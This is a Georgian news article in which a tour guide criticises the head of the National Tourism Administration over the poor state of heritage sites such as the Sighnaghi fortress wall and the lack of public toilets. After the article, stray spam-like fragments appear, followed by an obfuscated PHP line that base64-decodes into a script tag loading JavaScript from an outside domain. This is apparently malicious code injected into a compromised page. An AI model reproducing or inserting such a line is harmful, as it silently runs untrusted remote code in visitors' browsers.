tube
ავერსი jaluzi

გვეუბნებით, რომ ხართ ეროვნული მთავრობა, მაგრამ ეროვნული კულტურული მემკვიდრეობის ყველა ძეგლი არის სავალალო მდგომარეობაში, - ამ სიტყვებით მიმართა გიდმა ია გოცაძემ ტურიზმის ეროვნული ადმინისტრაციის ხელმძღვანელს, მაია ომიაძეს ტურიზმის სექტორთან შეხვედრისას, რომლის მიზანიც ტურიზმის ადმინისტრაციის მხრიდან ინდუსტრიის შედეგებისა და გეგმების წარდგენა იყო.

გიდმა მაგალითად სიღნაღი და სიღნაღში მდებარე გალავანი მოიყვანა, რომელიც მისი თქმით, სავალალო მდგომარეობაშია.

"თქვენ ამტკიცებთ, რომ ხართ ეროვნული მთავრობა, მეფე ერეკლე განსაკუთრებით გიყვართ, მაგრამ მეფე ერეკლეს აშენებული სიღნაღის გალავანი დღეს მძიმე მდგომარეობაშია. დაჟანგული რკინის მოაჯირებია, განათებები არის ძალიან ადრე გაკეთებული და ისიც საშიშია. რა გამოდის?

გვეუბნებით, რომ ხართ ეროვნული მთავრობა, მაგრამ ეროვნული კულტურული მემკვიდრეობის ყველა ძეგლი არის სავალალო მდგომარეობაში. გვეუბნებით, რომ ხართ კარგი მენეჯმენტის მქონე და ააყვავებთ ქვეყანას, მაგრამ მთელი ტურისტული ინფრასტრუქტურა არის განადგურებული. გვეუბნებით, რომ ყველაფერი ძალიან კარგად იქნება, მაგრამ არ გვეუბნებით საბაზისო საჭიროებების ტურისტული პრობლემები როგორ უნდა მოვაგვაროთ", - განაცხადა გიდმა გუშინდელ შეხვედრაზე.

მან საზოგადოებრივი საპირფარეშოების პრობლემაზეც გაამახვილა ყურადღება და აღნიშნა, რომ ტურიზმის ადმინისტრაცია მათ მხოლოდ "გამხნევებას" ცდილობს.

"მესმის, თქვენ ახლა დავალება გაქვთ, რომ უნდა გაგვამხნევოთ და გვითხრათ, რომ ყველაფერი კარგად იქნება, ვინაიდან რეჟიმს ასე სჭირდება. მაგრამ დაგვპრიდით მაინც, რომ ქვეყანაში ტუალეტები მოწესრიგდება, კულტურული მემკვიდრეობის ძეგლები მოწესრიგდება", - დასძინა გიდმა.

119
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");